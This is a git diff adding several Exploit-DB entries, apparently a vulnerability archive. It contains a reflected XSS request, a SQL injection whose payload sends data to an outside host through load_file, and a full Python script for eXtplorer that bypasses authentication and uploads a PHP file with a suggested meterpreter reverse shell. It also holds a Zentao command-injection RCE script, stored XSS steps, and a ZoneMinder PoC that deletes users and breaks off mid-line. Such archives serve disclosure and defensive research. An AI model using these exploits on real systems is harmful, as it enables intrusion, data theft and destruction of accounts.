a very +malicious URL. When the victim clicks into this crafted URL the game will +over for him. + +[+]Payload REQUEST: + +```HTML +GET /youthappam/login.php/lu555%22%3E%3Ca%20href=%22 +https://pornhub.com/%22%20target=%22_blank%22%20rel=%22noopener%20nofollow%20ugc%22%3E%20%3Cimg%20src=%22https://raw.githubusercontent.com/nu11secur1ty/XSSight/master/nu11secur1ty/images/IMG_0068.gif?token=GHSAT0AAAAAABXWGSKOH7MBFLEKF4M6Y3YCYYKADTQ&rs=1%22%20style=%22border:1px%20solid%20black;max-width:100%;%22%20alt=%22Photo%20of%20Byron%20Bay,%20one%20of%20Australia%27s%20best%20beaches!%22%3E%20%3C/a%3Emv2me +HTTP/1.1 +Host: pwnedhost.com +Accept-Encoding: gzip, deflate +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Language: en-US;q=0.9,en;q=0.8 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36 +Connection: close +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="106", +"Chromium";v="106" +Sec-CH-UA-Platform: Windows +Sec-CH-UA-Mobile: ?0 +``` + +[+]Payload RESPONSE: + +```burp +HTTP/1.1 200 OK +Date: Tue, 04 Oct 2022 09:44:55 GMT +Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6 +X-Powered-By: PHP/8.1.6 +Set-Cookie: PHPSESSID=m1teao9b0j86ep94m6v7ek7fe6; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 6140 +Connection: close +Content-Type: text/html; charset=UTF-8 + + + + + + + + + + + + + + + + + + + + + + + + + Youthappam Canteen Management System - by Mayuri K. +Freelancer + + + + + + + + + + + + + + + + + + + + + + +
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + +``` + +## Reproduce: +[href]( +https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/mayuri_k/2022/Canteen-Management +) + +## Proof and Exploit: +[href](https://streamable.com/emg0zo) + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51063.txt b/exploits/php/webapps/51063.txt new file mode 100644 index 000000000..ee26883eb --- /dev/null +++ b/exploits/php/webapps/51063.txt @@ -0,0 +1,62 @@ +## Exploit Title: Canteen-Management v1.0 - SQL Injection +## Exploit Author: nu11secur1ty +## Date: 10.04.2022 +## Vendor: https://www.mayurik.com/ +## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true +## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi + +## Description: +The username parameter from Canteen-Management1.0-2022 appears to be +vulnerable to SQL injection attacks. +The malicious user can attack remotely this system by using this +vulnerability to steal all information from the database of this +system. + +STATUS: HIGH Vulnerability + +[+]Payload: + +```mysql +--- +Parameter: username (POST) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (NOT) + Payload: username=UvIiDwEB'+(select +load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' +OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login= + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: username=UvIiDwEB'+(select +load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' +AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND +'awEr'='awEr&password=h5F!l8j!Y6&login= +--- +``` + +## Reproduce: +[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi) + +## Proof and Exploit: +[href](https://streamable.com/vvz2lh) + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at +https://packetstormsecurity.com/https://cve.mitre.org/index.html and +https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty + + +-- +System Administrator - Infrastructure Engineer +Penetration Testing Engineer +Exploit developer at https://packetstormsecurity.com/ +https://cve.mitre.org/index.html and https://www.exploit-db.com/ +home page: https://www.nu11secur1ty.com/ +hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= + nu11secur1ty \ No newline at end of file diff --git a/exploits/php/webapps/51067.txt b/exploits/php/webapps/51067.txt new file mode 100644 index 000000000..4fd75dd30 --- /dev/null +++ b/exploits/php/webapps/51067.txt @@ -0,0 +1,279 @@ +# Exploit Title: eXtplorer<= 2.1.14 - Authentication Bypass & Remote Code Execution (RCE) +# Exploit Author: ErPaciocco +# Author Website: https://erpaciocco.github.io +# Vendor Homepage: https://extplorer.net/ +# +# Vendor: +# ============== +# extplorer.net +# +# Product: +# ================== +# eXtplorer <= v2.1.14 +# +# eXtplorer is a PHP and Javascript-based File Manager, it allows to browse +# directories, edit, copy, move, delete, +# search, upload and download files, create & extract archives, create new +# files and directories, change file +# permissions (chmod) and more. It is often used as FTP extension for popular +# applications like Joomla. +# +# Vulnerability Type: +# ====================== +# Authentication Bypass (& Remote Command Execution) +# +# +# Vulnerability Details: +# ===================== +# +# eXtplorer authentication mechanism allows an attacker +# to login into the Admin Panel without knowing the password +# of the victim, but only its username. This vector is exploited +# by not supplying password in POST request. +# +# +# Tested on Windows +# +# +# Reproduction steps: +# ================== +# +# 1) Navigate to Login Panel +# 2) Intercept authentication POST request to /index.php +# 3) Remove 'password' field +# 4) Send it and enjoy! +# +# +# Exploit code(s): +# =============== +# +# Run below PY script from CLI... +# +# [eXtplorer_auth_bypass.py] +# + +# Proof Of Concept + +try: + import requests +except: + print(f"ERROR: RUN: pip install requests") + exit() +import sys +import time +import urllib.parse +import re +import random +import string +import socket +import time +import base64 + +TARGET = None +WORDLIST = None + +_BUILTIN_WL = [ + 'root', + 'admin', + 'test', + 'guest', + 'info', + 'adm', + 'user', + 'administrator' + ] + +_HOST = None +_PATH = None +_SESSION = None +_HEADERS = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8', + 'Accept-Language': 'it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate, br', + 'Connection': 'keep-alive' } + +def detect(): + global _HOST + global _PATH + global _SESSION + global _HEADERS + + _HOST = TARGET[0].split(':')[0] + '://' + TARGET[0].split('/')[2] + _PATH = '/'.join(TARGET[0].split('/')[3:]).rstrip('/') + + + + _SESSION = requests.Session() + + raw = _SESSION.get(f"{_HOST}/{_PATH}/extplorer.xml", headers=_HEADERS, verify=False) + + if raw.status_code == 200: + ver = re.findall("(((\d+)\.?)+)<\/version>", raw.text, re.MULTILINE) + + if int(ver[0][2]) < 15: + return True + + return False + + +def auth_bypass(): + global _HOST + global _PATH + global _SESSION + global _HEADERS + + global WORDLIST + global _BUILTIN_WL + + _HEADERS['X-Requested-With'] = 'XMLHttpRequest' + + params = {'option': 'com_extplorer', + 'action': 'login', + 'type': 'extplorer', + 'username': 'admin', + 'lang':'english'} + + if WORDLIST != None: + if WORDLIST == _BUILTIN_WL: + info(f"Attempting to guess an username from builtin wordlist") + wl = _BUILTIN_WL + else: + info(f"Attempting to guess an username from wordlist: {WORDLIST[0]}") + with open(WORDLIST[0], "r") as f: + wl = f.read().split('\n') + for user in wl: + params = {'option': 'com_extplorer', + 'action': 'login', + 'type': 'extplorer', + 'username': user, + 'lang':'english'} + + info(f"Trying with {user}") + + res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False) + if "successful" in res.text: + return (user) + else: + res = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, headers=_HEADERS, verify=False) + + if "successful" in res.text: + return ('admin') + + return False + +def rce(): + global _HOST + global _PATH + global _SESSION + global _HEADERS + global _PAYLOAD + + tokenReq = _SESSION.get(f"{_HOST}/{_PATH}/index.php?option=com_extplorer&action=include_javascript&file=functions.js") + token = re.findall("token:\s\"([a-f0-9]{32})\"", tokenReq.text)[0] + + info(f"CSRF Token obtained: {token}") + + payload = editPayload() + + info(f"Payload edited to fit local parameters") + + + params = {'option': 'com_extplorer', + 'action': 'upload', + 'dir': f"./{_PATH}", + 'requestType': 'xmlhttprequest', + 'confirm':'true', + 'token': token} + name = ''.join(random.choices(string.ascii_uppercase + string.digits, k=6)) + files = {'userfile[0]':(f"{name}.php", payload)} + + req = _SESSION.post(f"{_HOST}/{_PATH}/index.php", data=params, files=files, verify=False) + + if "successful" in req.text: + info(f"File {name}.php uploaded in root dir") + info(f"Now set a (metasploit) listener and go to: {_HOST}/{_PATH}/{name}.php") + +def attack(): + if not TARGET: + error("TARGET needed") + + if TARGET: + if not detect(): + error("eXtplorer vulnerable instance not found!") + exit(1) + else: + info("eXtplorer endpoint is vulnerable!") + username = auth_bypass() + if username: + info("Auth bypassed!") + rce() + else: + error("Username 'admin' not found") + +def error(message): + print(f"[E] {message}") + +def info(message): + print(f"[I] {message}") + +def editPayload(): + # You can generate payload with msfvenom and paste below base64 encoded result + # msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f base64 + return base64.b64decode("PD9waHAgZWNobyAiSEFDS0VEISI7ICA/Pg==") + +def help(): + print(r"""eXtplorer <= 2.1.14 exploit - Authentication Bypass & Remote Code Execution + +Usage: + python3 eXtplorer_auth_bypass.py -t [-w ] [-wb] + +Options: + -t Target host. Provide target IP address (and optionally port). + -w Wordlist for user enumeration and authentication (Optional) + -wb Use built-in wordlist for user enumeration (Optional) + -h Show this help menu. +""") + return True + +args = {"t" : (1, lambda *x: (globals().update(TARGET = x[0]))), + "w" : (1, lambda *x: (globals().update(WORDLIST = x[0]))), + "wb": (0, lambda *x: (globals().update(WORDLIST = _BUILTIN_WL))), + "h" : (0, lambda *x: (help() and exit(0)))} + +if __name__ == "__main__": + i = 1 + [ + args[ arg[1:]][1](sys.argv[i+1: (i:=i+1+args[arg[1:]][0]) ]) + for arg in [k + for k in sys.argv[i:] + ] + if arg[0] == '-' + ] + attack() +else: + help() + + +# /////////////////////////////////////////////////////////////////////// + +# [Script examples] +# +# +# c:\>python eXtplorer_auth_bypass.py -t https://target.com +# c:\>python eXtplorer_auth_bypass.py -t http://target.com:1234 -w wordlist.txt +# c:\>python eXtplorer_auth_bypass.py -t http://target.com -wb + +# Exploitation Method: +# ====================== +# Remote + +# [+] Disclaimer +# The information contained within this advisory is supplied "as-is" with no +# warranties or guarantees of fitness of use or otherwise. +# Permission is hereby granted for the redistribution of this advisory, +# provided that it is not altered except by reformatting it, and +# that due credit is given. Permission is explicitly given for insertion in +# vulnerability databases and similar, provided that due credit +# is given to the author. The author is not responsible for any misuse of the +# information contained herein and accepts no responsibility +# for any damage caused by the use or misuse of this information. \ No newline at end of file diff --git a/exploits/php/webapps/51068.txt b/exploits/php/webapps/51068.txt new file mode 100644 index 000000000..1bf052614 --- /dev/null +++ b/exploits/php/webapps/51068.txt @@ -0,0 +1,14 @@ +# Exploit Title: FlatCore CMS 2.1.1 -Stored Cross Site Scripting +# Date: 2020-09-24 +# Exploit Author: Sinem Şahin +# Vendor Homepage: https://flatcore.org/ +# Version: 2.1.1 +# Tested on: Windows & XAMPP + +==> Tutorial <== + +1- Go to the following url. => http://(HOST)/install/index.php +2- Write XSS Payload into the username of the user account. +3- Press "Save" button. + +XSS Payload ==> " \ No newline at end of file diff --git a/exploits/php/webapps/51069.txt b/exploits/php/webapps/51069.txt new file mode 100644 index 000000000..0821c1403 --- /dev/null +++ b/exploits/php/webapps/51069.txt @@ -0,0 +1,110 @@ +# Exploit Title: Zentao Project Management System 17.0 - Authenticated Remote Code Execution (RCE) +# Exploit Author: mister0xf +# Date: 2022-10-8 +# Software Link: https://github.com/easysoft/zentaopms +# Version: tested on 17.0 (probably works also on newer/older versions) +# Tested On: Kali Linux 2022.2 +# Exploit Tested Using: Python 3.10.4 +# Vulnerability Description: +# Zentao Project Management System 17.0 suffers from an authenticated command injection allowing +# remote attackers to obtain Remote Code Execution (RCE) on the hosting webserver + +# Vulnerable Source Code: +# /module/repo/model.php: +# [...] +# $client = $this->post->client; // <-- client is taken from the POST request +# [...] +# elseif($scm == 'Git') +# { +# if(!is_dir($path)) +# { +# dao::$errors['path'] = sprintf($this->lang->repo->error->noFile, $path); +# return false; +# } +# +# if(!chdir($path)) +# { +# if(!is_executable($path)) +# { +# dao::$errors['path'] = sprintf($this->lang->repo->error->noPriv, $path); +# return false; +# } +# dao::$errors['path'] = $this->lang->repo->error->path; +# return false; +# } +# +# $command = "$client tag 2>&1"; // <-- command is injected here +# exec($command, $output, $result); + +import requests,sys +import hashlib +from urllib.parse import urlparse +from bs4 import BeautifulSoup + +def banner(): + print(''' + ::::::::: :::::::::: :::: ::: :::::::: ::::::::::: ::: :::::::: + :+: :+: :+:+: :+: :+: :+: :+: :+: :+: :+: :+: + +:+ +:+ :+:+:+ +:+ +:+ +:+ +:+ +:+ +:+ +:+ + +#+ +#++:++# +#+ +:+ +#+ +#+ +#+ +#++:++#++: +#+ +:+ + +#+ +#+ +#+ +#+#+# +#+ +#+ +#+ +#+ +#+ +#+ + #+# #+# #+# #+#+# #+# #+# #+# #+# #+# #+# #+# +######### ########## ### #### ######## ########### ### ### ######## + ''') +def usage(): + print('Usage: zenciao user password http://127.0.0.1/path') + +def main(): + + if ((len(sys.argv)-1) != 3): + usage() + banner() + exit() + + #proxy = {'http':'http://127.0.0.1:8080'} + + banner() + username = sys.argv[1] + password = sys.argv[2] + target = sys.argv[3] + + # initialize session object + session = requests.session() + + home_url = target+'/index.php' + rand_url = target+'/index.php?m=user&f=refreshRandom&t=html' + login_url = target+'/index.php?m=user&f=login&t=html' + create_repo_url = target+'/index.php?m=repo&f=create&objectID=0' + + r1 = session.get(home_url) + soup = BeautifulSoup(r1.text, "html.parser") + script_tag = soup.find('script') + redirect_url = script_tag.string.split("'")[1] + r2 = session.get(target+redirect_url) + + # get random value + session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) + res = session.get(rand_url) + rand = res.text + + # compute md5(md5(password)+rand) + md5_pwd = hashlib.md5((hashlib.md5(password.encode()).hexdigest()+str(rand)).encode()) + + # login request + post_data = {"account":username,"password":md5_pwd.hexdigest(),"passwordStrength":1,"referer":"/zentaopms/www/","verifyRand":rand,"keepLogin":0,"captcha":""} + my_referer = target+'/zentaopms/www/index.php?m=user&f=login&t=html' + session.headers.update({'Referer': my_referer}) + session.headers.update({'X-Requested-With': 'XMLHttpRequest'}) + response = session.post(login_url, data=post_data) + + # exploit rce + # devops repo page + r2 = session.get(create_repo_url) + git_test_dir = '/home/' + command = 'whoami;' + exploit_post_data = {"SCM":"Git","name":"","path":git_test_dir,"encoding":"utf-8","client":command,"account":"","password":"","encrypt":"base64","desc":""} + r3 = session.post(create_repo_url, data=exploit_post_data) + print(r3.content) + +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/exploits/php/webapps/51070.txt b/exploits/php/webapps/51070.txt new file mode 100644 index 000000000..a7ed4540c --- /dev/null +++ b/exploits/php/webapps/51070.txt @@ -0,0 +1,16 @@ +# Exploit Title: Clansphere CMS 2011.4 - Stored Cross-Site Scripting (XSS) +# Exploit Author: Sinem Şahin +# Date: 2022-10-08 +# Vendor Homepage: https://www.csphere.eu/ +# Version: 2011.4 +# Tested on: Windows & XAMPP + +==> Tutorial <== + +1- Go to the following url. => http://(HOST)/index.php?mod=buddys&action=create&id=925872 +2- Write XSS Payload into the username of the buddy list create. +3- Press "Save" button. + +XSS Payload ==> " + +Link: https://github.com/sinemsahn/POC/blob/main/Create%20Clansphere%202011.4%20%22username%22%20xss.md \ No newline at end of file diff --git a/exploits/php/webapps/51071.py b/exploits/php/webapps/51071.py new file mode 100755 index 000000000..7df15e0e5 --- /dev/null +++ b/exploits/php/webapps/51071.py @@ -0,0 +1,70 @@ +# Exploit Title: Zoneminder v1.36.26 - Log Injection -> CSRF Bypass -> Stored Cross-Site Scripting (XSS) +# Date: 10/01/2022 +# Exploit Author: Trenches of IT +# Vendor Homepage: https://github.com/ZoneMinder/zoneminder +# Version: v1.36.26 +# Tested on: Linux/Windows +# CVE: CVE-2022-39285, CVE-2022-39290, CVE-2022-39291 +# Writeup: https://www.trenchesofit.com/2022/09/30/zoneminder-web-app-testing/ +# +# Proof of Concept: +# 1 - The PoC injects a XSS payload with the CSRF bypass into logs. (This action will repeat every second until manually stopped) +# 2 - Admin user logs navigates to http:///zm/index.php?view=log +# 3 - XSS executes delete function on target UID (user). + +import requests +import re +import time +import argparse +import sys + +def getOptions(args=sys.argv[1:]): + parser = argparse.ArgumentParser(description="Trenches of IT Zoneminder Exploit PoC", epilog="Example: poc.py -i 1.2.3.4 -p 80 -u lowpriv -p lowpriv -d 1") + parser.add_argument("-i", "--ip", help="Provide the IP or hostname of the target zoneminder server. (Example: -i 1.2.3.4", required=True) + parser.add_argument("-p", "--port", help="Provide the port of the target zoneminder server. (Example: -p 80", required=True) + parser.add_argument("-zU", "--username", help="Provide the low privileged username for the target zoneminder server. (Example: -zU lowpriv", required=True) + parser.add_argument("-zP", "--password", help="Provide the low privileged password for the target zoneminder server. (Example: -zP lowpriv", required=True) + parser.add_argument("-d", "--deleteUser", help="Provide the target user UID to delete from the target zoneminder server. (Example: -d 7", required=True) + options = parser.parse_args(args) + return options + +options = getOptions(sys.argv[1:]) + +payload = "http%3A%2F%2F" + options.ip + "%2Fzm%2F +